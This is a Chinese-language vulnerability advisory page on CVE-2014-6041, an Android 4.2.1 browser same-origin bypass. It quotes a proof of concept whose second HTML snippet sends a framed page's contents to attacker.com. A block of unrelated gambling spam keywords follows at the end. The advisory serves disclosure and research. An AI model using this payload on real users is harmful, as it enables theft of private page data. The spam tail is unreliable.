首頁 -> 安全研究

安全研究

安全漏洞
Google Android Browser同源策略安全限制繞過漏洞(CVE-2014-6041)

發布日期:2014-09-02
更新日期:2014-09-18

受影響系統:
Google Android Browser 4.2.1
描述:
BUGTRAQ  ID: 69548
CVE(CAN) ID: CVE-2014-6041

Android是基于Linux開放性內核的操作系統,是Google公司在2007年11月5日公布的手機操作系統。

Android瀏覽器應用4.2.1版本在實現上存在安全限制繞過漏洞,遠程攻擊者通過包含\u0000字符的構造屬性,利用此漏洞可繞過同源策略。

<*來源:Rafay Baloch
  
  鏈接:http://xforce.iss.net/xforce/xfdb/95693
        http://1337day.com/exploit/22581
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

Rafay Baloch ()提供了如下測試方法:

*Reading the response*


You can read the response of any page by accessing the
document.body.innerHTML property.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"
>


*Stealing the response and sending it to an attackers domain*


In real world situation an attacker would send the response to his
controlled domain.


<iframe name="test" src="http://www.rhainfosec.com"></iframe>

<input type=button value="test"

onclick="window.open('\u0000javascript:var i=new Image();i.src='//
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')"
>

建議:
廠商補丁:

Google
------
目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:

http://code.google.com/android/

參考:https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041

瀏覽次數:16653
嚴重程度:0(網友投票)
本安全漏洞由綠盟科技翻譯整理,版權所有,未經許可,不得轉載
綠盟科技給您安全的保障
重庆时时彩计划准不准 梦幻西游牧场老的赚钱 时时彩龙虎合玩法简介 幸运赛车网站 安卓比较好的赚钱软件 分分彩app苹果版 pk10五码34567定位法 一个赌徒10年赌博经验 2000炮李逵劈鱼捕鱼机 澳洲幸运5官网是正规彩票么 江西快三走势图今天 后二直选复式玩法介绍 11选5追号计划软件